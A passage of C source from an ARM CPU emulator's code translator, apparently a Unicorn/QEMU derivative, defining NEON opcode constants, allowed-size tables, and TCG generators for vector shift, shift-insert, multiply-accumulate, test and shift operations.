*/ #define NEON_3R_VHADD 0 #define NEON_3R_VQADD 1 #define NEON_3R_VRHADD 2 #define NEON_3R_LOGIC 3 /* VAND,VBIC,VORR,VMOV,VORN,VEOR,VBIF,VBIT,VBSL */ #define NEON_3R_VHSUB 4 #define NEON_3R_VQSUB 5 #define NEON_3R_VCGT 6 #define NEON_3R_VCGE 7 #define NEON_3R_VSHL 8 #define NEON_3R_VQSHL 9 #define NEON_3R_VRSHL 10 #define NEON_3R_VQRSHL 11 #define NEON_3R_VMAX 12 #define NEON_3R_VMIN 13 #define NEON_3R_VABD 14 #define NEON_3R_VABA 15 #define NEON_3R_VADD_VSUB 16 #define NEON_3R_VTST_VCEQ 17 #define NEON_3R_VML 18 /* VMLA, VMLS */ #define NEON_3R_VMUL 19 #define NEON_3R_VPMAX 20 #define NEON_3R_VPMIN 21 #define NEON_3R_VQDMULH_VQRDMULH 22 #define NEON_3R_VPADD_VQRDMLAH 23 #define NEON_3R_SHA 24 /* SHA1C,SHA1P,SHA1M,SHA1SU0,SHA256H{2},SHA256SU1 */ #define NEON_3R_VFM_VQRDMLSH 25 /* VFMA, VFMS, VQRDMLSH */ #define NEON_3R_FLOAT_ARITH 26 /* float VADD, VSUB, VPADD, VABD */ #define NEON_3R_FLOAT_MULTIPLY 27 /* float VMLA, VMLS, VMUL */ #define NEON_3R_FLOAT_CMP 28 /* float VCEQ, VCGE, VCGT */ #define NEON_3R_FLOAT_ACMP 29 /* float VACGE, VACGT, VACLE, VACLT */ #define NEON_3R_FLOAT_MINMAX 30 /* float VMIN, VMAX */ #define NEON_3R_FLOAT_MISC 31 /* float VRECPS, VRSQRTS, VMAXNM/MINNM */ static const uint8_t neon_3r_sizes[] = { [NEON_3R_VHADD] = 0x7, [NEON_3R_VQADD] = 0xf, [NEON_3R_VRHADD] = 0x7, [NEON_3R_LOGIC] = 0xf, /* size field encodes op type */ [NEON_3R_VHSUB] = 0x7, [NEON_3R_VQSUB] = 0xf, [NEON_3R_VCGT] = 0x7, [NEON_3R_VCGE] = 0x7, [NEON_3R_VSHL] = 0xf, [NEON_3R_VQSHL] = 0xf, [NEON_3R_VRSHL] = 0xf, [NEON_3R_VQRSHL] = 0xf, [NEON_3R_VMAX] = 0x7, [NEON_3R_VMIN] = 0x7, [NEON_3R_VABD] = 0x7, [NEON_3R_VABA] = 0x7, [NEON_3R_VADD_VSUB] = 0xf, [NEON_3R_VTST_VCEQ] = 0x7, [NEON_3R_VML] = 0x7, [NEON_3R_VMUL] = 0x7, [NEON_3R_VPMAX] = 0x7, [NEON_3R_VPMIN] = 0x7, [NEON_3R_VQDMULH_VQRDMULH] = 0x6, [NEON_3R_VPADD_VQRDMLAH] = 0x7, [NEON_3R_SHA] = 0xf, /* size field encodes op type */ [NEON_3R_VFM_VQRDMLSH] = 0x7, /* For VFM, size bit 1 encodes op */ [NEON_3R_FLOAT_ARITH] = 0x5, /* size bit 1 encodes op */ [NEON_3R_FLOAT_MULTIPLY] = 0x5, /* size bit 1 encodes op */ [NEON_3R_FLOAT_CMP] = 0x5, /* size bit 1 encodes op */ [NEON_3R_FLOAT_ACMP] = 0x5, /* size bit 1 encodes op */ [NEON_3R_FLOAT_MINMAX] = 0x5, /* size bit 1 encodes op */ [NEON_3R_FLOAT_MISC] = 0x5, /* size bit 1 encodes op */ }; /* Symbolic constants for op fields for Neon 2-register miscellaneous. * The values correspond to bits [17:16,10:7]; see the ARM ARM DDI0406B * table A7-13. 
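 * Here the value is (bits [17:16] << 4) | bits [10:7]; e.g. NEON_2RM_VSWP == 32 ==
 * 0b100000 decodes as bits [17:16] == 0b10 and bits [10:7] == 0b0000. The gaps in
 * the list (3, 29) are unallocated encodings.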
*/ #define NEON_2RM_VREV64 0 #define NEON_2RM_VREV32 1 #define NEON_2RM_VREV16 2 #define NEON_2RM_VPADDL 4 #define NEON_2RM_VPADDL_U 5 #define NEON_2RM_AESE 6 /* Includes AESD */ #define NEON_2RM_AESMC 7 /* Includes AESIMC */ #define NEON_2RM_VCLS 8 #define NEON_2RM_VCLZ 9 #define NEON_2RM_VCNT 10 #define NEON_2RM_VMVN 11 #define NEON_2RM_VPADAL 12 #define NEON_2RM_VPADAL_U 13 #define NEON_2RM_VQABS 14 #define NEON_2RM_VQNEG 15 #define NEON_2RM_VCGT0 16 #define NEON_2RM_VCGE0 17 #define NEON_2RM_VCEQ0 18 #define NEON_2RM_VCLE0 19 #define NEON_2RM_VCLT0 20 #define NEON_2RM_SHA1H 21 #define NEON_2RM_VABS 22 #define NEON_2RM_VNEG 23 #define NEON_2RM_VCGT0_F 24 #define NEON_2RM_VCGE0_F 25 #define NEON_2RM_VCEQ0_F 26 #define NEON_2RM_VCLE0_F 27 #define NEON_2RM_VCLT0_F 28 #define NEON_2RM_VABS_F 30 #define NEON_2RM_VNEG_F 31 #define NEON_2RM_VSWP 32 #define NEON_2RM_VTRN 33 #define NEON_2RM_VUZP 34 #define NEON_2RM_VZIP 35 #define NEON_2RM_VMOVN 36 /* Includes VQMOVN, VQMOVUN */ #define NEON_2RM_VQMOVN 37 /* Includes VQMOVUN */ #define NEON_2RM_VSHLL 38 #define NEON_2RM_SHA1SU1 39 /* Includes SHA256SU0 */ #define NEON_2RM_VRINTN 40 #define NEON_2RM_VRINTX 41 #define NEON_2RM_VRINTA 42 #define NEON_2RM_VRINTZ 43 #define NEON_2RM_VCVT_F16_F32 44 #define NEON_2RM_VRINTM 45 #define NEON_2RM_VCVT_F32_F16 46 #define NEON_2RM_VRINTP 47 #define NEON_2RM_VCVTAU 48 #define NEON_2RM_VCVTAS 49 #define NEON_2RM_VCVTNU 50 #define NEON_2RM_VCVTNS 51 #define NEON_2RM_VCVTPU 52 #define NEON_2RM_VCVTPS 53 #define NEON_2RM_VCVTMU 54 #define NEON_2RM_VCVTMS 55 #define NEON_2RM_VRECPE 56 #define NEON_2RM_VRSQRTE 57 #define NEON_2RM_VRECPE_F 58 #define NEON_2RM_VRSQRTE_F 59 #define NEON_2RM_VCVT_FS 60 #define NEON_2RM_VCVT_FU 61 #define NEON_2RM_VCVT_SF 62 #define NEON_2RM_VCVT_UF 63 static bool neon_2rm_is_v8_op(int op) { /* Return true if this neon 2reg-misc op is ARMv8 and up */ switch (op) { case NEON_2RM_VRINTN: case NEON_2RM_VRINTA: case NEON_2RM_VRINTM: case NEON_2RM_VRINTP: case NEON_2RM_VRINTZ: case NEON_2RM_VRINTX: case NEON_2RM_VCVTAU: case NEON_2RM_VCVTAS: case NEON_2RM_VCVTNU: case NEON_2RM_VCVTNS: case NEON_2RM_VCVTPU: case NEON_2RM_VCVTPS: case NEON_2RM_VCVTMU: case NEON_2RM_VCVTMS: return true; default: return false; } } /* Each entry in this array has bit n set if the insn allows * size value n (otherwise it will UNDEF). Since unallocated * op values will have no bits set they always UNDEF. 
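 * E.g. [NEON_2RM_VREV32] = 0x3 permits sizes 0 and 1 only, so a VREV32 of 32-bit
 * elements UNDEFs, while the 0x4 entries are ops restricted to size == 2.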
*/ static const uint8_t neon_2rm_sizes[] = { [NEON_2RM_VREV64] = 0x7, [NEON_2RM_VREV32] = 0x3, [NEON_2RM_VREV16] = 0x1, [NEON_2RM_VPADDL] = 0x7, [NEON_2RM_VPADDL_U] = 0x7, [NEON_2RM_AESE] = 0x1, [NEON_2RM_AESMC] = 0x1, [NEON_2RM_VCLS] = 0x7, [NEON_2RM_VCLZ] = 0x7, [NEON_2RM_VCNT] = 0x1, [NEON_2RM_VMVN] = 0x1, [NEON_2RM_VPADAL] = 0x7, [NEON_2RM_VPADAL_U] = 0x7, [NEON_2RM_VQABS] = 0x7, [NEON_2RM_VQNEG] = 0x7, [NEON_2RM_VCGT0] = 0x7, [NEON_2RM_VCGE0] = 0x7, [NEON_2RM_VCEQ0] = 0x7, [NEON_2RM_VCLE0] = 0x7, [NEON_2RM_VCLT0] = 0x7, [NEON_2RM_SHA1H] = 0x4, [NEON_2RM_VABS] = 0x7, [NEON_2RM_VNEG] = 0x7, [NEON_2RM_VCGT0_F] = 0x4, [NEON_2RM_VCGE0_F] = 0x4, [NEON_2RM_VCEQ0_F] = 0x4, [NEON_2RM_VCLE0_F] = 0x4, [NEON_2RM_VCLT0_F] = 0x4, [NEON_2RM_VABS_F] = 0x4, [NEON_2RM_VNEG_F] = 0x4, [NEON_2RM_VSWP] = 0x1, [NEON_2RM_VTRN] = 0x7, [NEON_2RM_VUZP] = 0x7, [NEON_2RM_VZIP] = 0x7, [NEON_2RM_VMOVN] = 0x7, [NEON_2RM_VQMOVN] = 0x7, [NEON_2RM_VSHLL] = 0x7, [NEON_2RM_SHA1SU1] = 0x4, [NEON_2RM_VRINTN] = 0x4, [NEON_2RM_VRINTX] = 0x4, [NEON_2RM_VRINTA] = 0x4, [NEON_2RM_VRINTZ] = 0x4, [NEON_2RM_VCVT_F16_F32] = 0x2, [NEON_2RM_VRINTM] = 0x4, [NEON_2RM_VCVT_F32_F16] = 0x2, [NEON_2RM_VRINTP] = 0x4, [NEON_2RM_VCVTAU] = 0x4, [NEON_2RM_VCVTAS] = 0x4, [NEON_2RM_VCVTNU] = 0x4, [NEON_2RM_VCVTNS] = 0x4, [NEON_2RM_VCVTPU] = 0x4, [NEON_2RM_VCVTPS] = 0x4, [NEON_2RM_VCVTMU] = 0x4, [NEON_2RM_VCVTMS] = 0x4, [NEON_2RM_VRECPE] = 0x4, [NEON_2RM_VRSQRTE] = 0x4, [NEON_2RM_VRECPE_F] = 0x4, [NEON_2RM_VRSQRTE_F] = 0x4, [NEON_2RM_VCVT_FS] = 0x4, [NEON_2RM_VCVT_FU] = 0x4, [NEON_2RM_VCVT_SF] = 0x4, [NEON_2RM_VCVT_UF] = 0x4, }; /* Expand v8.1 simd helper. */ static int do_v81_helper(DisasContext *s, gen_helper_gvec_3_ptr *fn, int q, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (dc_isar_feature(aa32_rdm, s)) { int opr_sz = (1 + q) * 8; tcg_gen_gvec_3_ptr(tcg_ctx, vfp_reg_offset(1, rd), vfp_reg_offset(1, rn), vfp_reg_offset(1, rm), tcg_ctx->cpu_env, opr_sz, opr_sz, 0, fn); return 0; } return 1; } static void gen_ssra8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_vec_sar8i_i64(tcg_ctx, a, a, shift); tcg_gen_vec_add8_i64(tcg_ctx, d, d, a); } static void gen_ssra16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_vec_sar16i_i64(tcg_ctx, a, a, shift); tcg_gen_vec_add16_i64(tcg_ctx, d, d, a); } static void gen_ssra32_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, int32_t shift) { tcg_gen_sari_i32(tcg_ctx, a, a, shift); tcg_gen_add_i32(tcg_ctx, d, d, a); } static void gen_ssra64_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_sari_i64(tcg_ctx, a, a, shift); tcg_gen_add_i64(tcg_ctx, d, d, a); } static void gen_ssra_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, int64_t sh) { tcg_gen_sari_vec(tcg_ctx, vece, a, a, sh); tcg_gen_add_vec(tcg_ctx, vece, d, d, a); } static const TCGOpcode vecop_list_ssra[] = { INDEX_op_sari_vec, INDEX_op_add_vec, 0 }; const GVecGen2i ssra_op[4] = { { .fni8 = gen_ssra8_i64, .fniv = gen_ssra_vec, .load_dest = true, .opt_opc = vecop_list_ssra, .vece = MO_8 }, { .fni8 = gen_ssra16_i64, .fniv = gen_ssra_vec, .load_dest = true, .opt_opc = vecop_list_ssra, .vece = MO_16 }, { .fni4 = gen_ssra32_i32, .fniv = gen_ssra_vec, .load_dest = true, .opt_opc = vecop_list_ssra, .vece = MO_32 }, { .fni8 = gen_ssra64_i64, .fniv = gen_ssra_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .opt_opc = vecop_list_ssra, .load_dest = true, .vece = MO_64 }, }; static void gen_usra8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t 
shift) { tcg_gen_vec_shr8i_i64(tcg_ctx, a, a, shift); tcg_gen_vec_add8_i64(tcg_ctx, d, d, a); } static void gen_usra16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_vec_shr16i_i64(tcg_ctx, a, a, shift); tcg_gen_vec_add16_i64(tcg_ctx, d, d, a); } static void gen_usra32_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, int32_t shift) { tcg_gen_shri_i32(tcg_ctx, a, a, shift); tcg_gen_add_i32(tcg_ctx, d, d, a); } static void gen_usra64_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_shri_i64(tcg_ctx, a, a, shift); tcg_gen_add_i64(tcg_ctx, d, d, a); } static void gen_usra_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, int64_t sh) { tcg_gen_shri_vec(tcg_ctx, vece, a, a, sh); tcg_gen_add_vec(tcg_ctx, vece, d, d, a); } static const TCGOpcode vecop_list_usra[] = { INDEX_op_shri_vec, INDEX_op_add_vec, 0 }; const GVecGen2i usra_op[4] = { { .fni8 = gen_usra8_i64, .fniv = gen_usra_vec, .load_dest = true, .opt_opc = vecop_list_usra, .vece = MO_8, }, { .fni8 = gen_usra16_i64, .fniv = gen_usra_vec, .load_dest = true, .opt_opc = vecop_list_usra, .vece = MO_16, }, { .fni4 = gen_usra32_i32, .fniv = gen_usra_vec, .load_dest = true, .opt_opc = vecop_list_usra, .vece = MO_32, }, { .fni8 = gen_usra64_i64, .fniv = gen_usra_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .load_dest = true, .opt_opc = vecop_list_usra, .vece = MO_64, }, }; static void gen_shr8_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { uint64_t mask = dup_const(MO_8, 0xff >> shift); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, a, shift); tcg_gen_andi_i64(tcg_ctx, t, t, mask); tcg_gen_andi_i64(tcg_ctx, d, d, ~mask); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static void gen_shr16_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { uint64_t mask = dup_const(MO_16, 0xffff >> shift); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, a, shift); tcg_gen_andi_i64(tcg_ctx, t, t, mask); tcg_gen_andi_i64(tcg_ctx, d, d, ~mask); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static void gen_shr32_ins_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, int32_t shift) { tcg_gen_shri_i32(tcg_ctx, a, a, shift); tcg_gen_deposit_i32(tcg_ctx, d, d, a, 0, 32 - shift); } static void gen_shr64_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_shri_i64(tcg_ctx, a, a, shift); tcg_gen_deposit_i64(tcg_ctx, d, d, a, 0, 64 - shift); } static void gen_shr_ins_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, int64_t sh) { if (sh == 0) { tcg_gen_mov_vec(tcg_ctx, d, a); } else { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, d); TCGv_vec m = tcg_temp_new_vec_matching(tcg_ctx, d); tcg_gen_dupi_vec(tcg_ctx, vece, m, MAKE_64BIT_MASK((8 << vece) - sh, sh)); tcg_gen_shri_vec(tcg_ctx, vece, t, a, sh); tcg_gen_and_vec(tcg_ctx, vece, d, d, m); tcg_gen_or_vec(tcg_ctx, vece, d, d, t); tcg_temp_free_vec(tcg_ctx, t); tcg_temp_free_vec(tcg_ctx, m); } } static const TCGOpcode vecop_list_sri[] = { INDEX_op_shri_vec, 0 }; const GVecGen2i sri_op[4] = { { .fni8 = gen_shr8_ins_i64, .fniv = gen_shr_ins_vec, .load_dest = true, .opt_opc = vecop_list_sri, .vece = MO_8 }, { .fni8 = gen_shr16_ins_i64, .fniv = gen_shr_ins_vec, .load_dest = true, .opt_opc = vecop_list_sri, .vece = MO_16 }, { .fni4 = gen_shr32_ins_i32, .fniv = gen_shr_ins_vec, .load_dest = true, .opt_opc = vecop_list_sri, .vece = MO_32 }, { .fni8 = gen_shr64_ins_i64, .fniv = gen_shr_ins_vec, .prefer_i64 = 
TCG_TARGET_REG_BITS == 64, .load_dest = true, .opt_opc = vecop_list_sri, .vece = MO_64 }, }; static void gen_shl8_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { uint64_t mask = dup_const(MO_8, 0xff << shift); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shli_i64(tcg_ctx, t, a, shift); tcg_gen_andi_i64(tcg_ctx, t, t, mask); tcg_gen_andi_i64(tcg_ctx, d, d, ~mask); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static void gen_shl16_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { uint64_t mask = dup_const(MO_16, 0xffff << shift); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shli_i64(tcg_ctx, t, a, shift); tcg_gen_andi_i64(tcg_ctx, t, t, mask); tcg_gen_andi_i64(tcg_ctx, d, d, ~mask); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } static void gen_shl32_ins_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, int32_t shift) { tcg_gen_deposit_i32(tcg_ctx, d, d, a, shift, 32 - shift); } static void gen_shl64_ins_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, int64_t shift) { tcg_gen_deposit_i64(tcg_ctx, d, d, a, shift, 64 - shift); } static void gen_shl_ins_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, int64_t sh) { if (sh == 0) { tcg_gen_mov_vec(tcg_ctx, d, a); } else { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, d); TCGv_vec m = tcg_temp_new_vec_matching(tcg_ctx, d); tcg_gen_dupi_vec(tcg_ctx, vece, m, MAKE_64BIT_MASK(0, sh)); tcg_gen_shli_vec(tcg_ctx, vece, t, a, sh); tcg_gen_and_vec(tcg_ctx, vece, d, d, m); tcg_gen_or_vec(tcg_ctx, vece, d, d, t); tcg_temp_free_vec(tcg_ctx, t); tcg_temp_free_vec(tcg_ctx, m); } } static const TCGOpcode vecop_list_sli[] = { INDEX_op_shli_vec, 0 }; const GVecGen2i sli_op[4] = { { .fni8 = gen_shl8_ins_i64, .fniv = gen_shl_ins_vec, .load_dest = true, .opt_opc = vecop_list_sli, .vece = MO_8 }, { .fni8 = gen_shl16_ins_i64, .fniv = gen_shl_ins_vec, .load_dest = true, .opt_opc = vecop_list_sli, .vece = MO_16 }, { .fni4 = gen_shl32_ins_i32, .fniv = gen_shl_ins_vec, .load_dest = true, .opt_opc = vecop_list_sli, .vece = MO_32 }, { .fni8 = gen_shl64_ins_i64, .fniv = gen_shl_ins_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .load_dest = true, .opt_opc = vecop_list_sli, .vece = MO_64 }, }; static void gen_mla8_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { gen_helper_neon_mul_u8(tcg_ctx, a, a, b); gen_helper_neon_add_u8(tcg_ctx, d, d, a); } static void gen_mls8_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { gen_helper_neon_mul_u8(tcg_ctx, a, a, b); gen_helper_neon_sub_u8(tcg_ctx, d, d, a); } static void gen_mla16_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { gen_helper_neon_mul_u16(tcg_ctx, a, a, b); gen_helper_neon_add_u16(tcg_ctx, d, d, a); } static void gen_mls16_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { gen_helper_neon_mul_u16(tcg_ctx, a, a, b); gen_helper_neon_sub_u16(tcg_ctx, d, d, a); } static void gen_mla32_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { tcg_gen_mul_i32(tcg_ctx, a, a, b); tcg_gen_add_i32(tcg_ctx, d, d, a); } static void gen_mls32_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { tcg_gen_mul_i32(tcg_ctx, a, a, b); tcg_gen_sub_i32(tcg_ctx, d, d, a); } static void gen_mla64_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { tcg_gen_mul_i64(tcg_ctx, a, a, b); tcg_gen_add_i64(tcg_ctx, d, d, a); } static void gen_mls64_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { tcg_gen_mul_i64(tcg_ctx, a, a, b); tcg_gen_sub_i64(tcg_ctx, 
d, d, a); } static void gen_mla_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { tcg_gen_mul_vec(tcg_ctx, vece, a, a, b); tcg_gen_add_vec(tcg_ctx, vece, d, d, a); } static void gen_mls_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { tcg_gen_mul_vec(tcg_ctx, vece, a, a, b); tcg_gen_sub_vec(tcg_ctx, vece, d, d, a); } /* Note that while NEON does not support VMLA and VMLS as 64-bit ops, * these tables are shared with AArch64 which does support them. */ static const TCGOpcode vecop_list_mla[] = { INDEX_op_mul_vec, INDEX_op_add_vec, 0 }; static const TCGOpcode vecop_list_mls[] = { INDEX_op_mul_vec, INDEX_op_sub_vec, 0 }; const GVecGen3 mla_op[4] = { { .fni4 = gen_mla8_i32, .fniv = gen_mla_vec, .load_dest = true, .opt_opc = vecop_list_mla, .vece = MO_8 }, { .fni4 = gen_mla16_i32, .fniv = gen_mla_vec, .load_dest = true, .opt_opc = vecop_list_mla, .vece = MO_16 }, { .fni4 = gen_mla32_i32, .fniv = gen_mla_vec, .load_dest = true, .opt_opc = vecop_list_mla, .vece = MO_32 }, { .fni8 = gen_mla64_i64, .fniv = gen_mla_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .load_dest = true, .opt_opc = vecop_list_mla, .vece = MO_64 }, }; const GVecGen3 mls_op[4] = { { .fni4 = gen_mls8_i32, .fniv = gen_mls_vec, .load_dest = true, .opt_opc = vecop_list_mls, .vece = MO_8 }, { .fni4 = gen_mls16_i32, .fniv = gen_mls_vec, .load_dest = true, .opt_opc = vecop_list_mls, .vece = MO_16 }, { .fni4 = gen_mls32_i32, .fniv = gen_mls_vec, .load_dest = true, .opt_opc = vecop_list_mls, .vece = MO_32 }, { .fni8 = gen_mls64_i64, .fniv = gen_mls_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .load_dest = true, .opt_opc = vecop_list_mls, .vece = MO_64 }, }; /* CMTST : test is "if (X & Y != 0)". */ static void gen_cmtst_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { tcg_gen_and_i32(tcg_ctx, d, a, b); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_NE, d, d, 0); tcg_gen_neg_i32(tcg_ctx, d, d); } void gen_cmtst_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { tcg_gen_and_i64(tcg_ctx, d, a, b); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, d, d, 0); tcg_gen_neg_i64(tcg_ctx, d, d); } static void gen_cmtst_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec d, TCGv_vec a, TCGv_vec b) { tcg_gen_and_vec(tcg_ctx, vece, d, a, b); tcg_gen_dupi_vec(tcg_ctx, vece, a, 0); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, vece, d, d, a); } static const TCGOpcode vecop_list_cmtst[] = { INDEX_op_cmp_vec, 0 }; const GVecGen3 cmtst_op[4] = { { .fni4 = gen_helper_neon_tst_u8, .fniv = gen_cmtst_vec, .opt_opc = vecop_list_cmtst, .vece = MO_8 }, { .fni4 = gen_helper_neon_tst_u16, .fniv = gen_cmtst_vec, .opt_opc = vecop_list_cmtst, .vece = MO_16 }, { .fni4 = gen_cmtst_i32, .fniv = gen_cmtst_vec, .opt_opc = vecop_list_cmtst, .vece = MO_32 }, { .fni8 = gen_cmtst_i64, .fniv = gen_cmtst_vec, .prefer_i64 = TCG_TARGET_REG_BITS == 64, .opt_opc = vecop_list_cmtst, .vece = MO_64 }, }; void gen_ushl_i32(TCGContext *tcg_ctx, TCGv_i32 dst, TCGv_i32 src, TCGv_i32 shift) { TCGv_i32 lval = tcg_temp_new_i32(tcg_ctx); TCGv_i32 rval = tcg_temp_new_i32(tcg_ctx); TCGv_i32 lsh = tcg_temp_new_i32(tcg_ctx); TCGv_i32 rsh = tcg_temp_new_i32(tcg_ctx); TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); TCGv_i32 max = tcg_const_i32(tcg_ctx, 32); /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. 
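 * The low byte of the shift operand is sign-extended: non-negative counts select the
 * left-shift result, negative counts the right shift by the negated amount, and the
 * two movcond ops below force the result to zero once either magnitude reaches 32.
 * E.g. shift == -3 gives lsh == -3 (discarded, as it is >= 32 unsigned) and
 * rsh == 3, so dst = src >> 3.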
*/ tcg_gen_ext8s_i32(tcg_ctx, lsh, shift); tcg_gen_neg_i32(tcg_ctx, rsh, lsh); tcg_gen_shl_i32(tcg_ctx, lval, src, lsh); tcg_gen_shr_i32(tcg_ctx, rval, src, rsh); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, dst, lsh, max, lval, zero); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, dst, rsh, max, rval, dst); tcg_temp_free_i32(tcg_ctx, lval); tcg_temp_free_i32(tcg_ctx, rval); tcg_temp_free_i32(tcg_ctx, lsh); tcg_temp_free_i32(tcg_ctx, rsh); tcg_temp_free_i32(tcg_ctx, zero); tcg_temp_free_i32(tcg_ctx, max); } void gen_ushl_i64(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, TCGv_i64 shift) { TCGv_i64 lval = tcg_temp_new_i64(tcg_ctx); TCGv_i64 rval = tcg_temp_new_i64(tcg_ctx); TCGv_i64 lsh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 rsh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); TCGv_i64 max = tcg_const_i64(tcg_ctx, 64); /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. */ tcg_gen_ext8s_i64(tcg_ctx, lsh, shift); tcg_gen_neg_i64(tcg_ctx, rsh, lsh); tcg_gen_shl_i64(tcg_ctx, lval, src, lsh); tcg_gen_shr_i64(tcg_ctx, rval, src, rsh); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, dst, lsh, max, lval, zero); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, dst, rsh, max, rval, dst); tcg_temp_free_i64(tcg_ctx, lval); tcg_temp_free_i64(tcg_ctx, rval); tcg_temp_free_i64(tcg_ctx, lsh); tcg_temp_free_i64(tcg_ctx, rsh); tcg_temp_free_i64(tcg_ctx, zero); tcg_temp_free_i64(tcg_ctx, max); } static void gen_ushl_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec dst, TCGv_vec src, TCGv_vec shift) { TCGv_vec lval = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec rval = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec lsh = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec rsh = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec msk, max; tcg_gen_neg_vec(tcg_ctx, vece, rsh, shift); if (vece == MO_8) { tcg_gen_mov_vec(tcg_ctx, lsh, shift); } else { msk = tcg_temp_new_vec_matching(tcg_ctx, dst); tcg_gen_dupi_vec(tcg_ctx, vece, msk, 0xff); tcg_gen_and_vec(tcg_ctx, vece, lsh, shift, msk); tcg_gen_and_vec(tcg_ctx, vece, rsh, rsh, msk); tcg_temp_free_vec(tcg_ctx, msk); } /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. */ tcg_gen_shlv_vec(tcg_ctx, vece, lval, src, lsh); tcg_gen_shrv_vec(tcg_ctx, vece, rval, src, rsh); max = tcg_temp_new_vec_matching(tcg_ctx, dst); tcg_gen_dupi_vec(tcg_ctx, vece, max, 8 << vece); /* * The choice of LT (signed) and GEU (unsigned) are biased toward * the instructions of the x86_64 host. For MO_8, the whole byte * is significant so we must use an unsigned compare; otherwise we * have already masked to a byte and so a signed compare works. * Other tcg hosts have a full set of comparisons and do not care. 
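 * For MO_8 all eight bits of the count are significant (0x80 must read as 128, i.e.
 * out of range, not as -128), hence the unsigned GEU compare; for wider elements the
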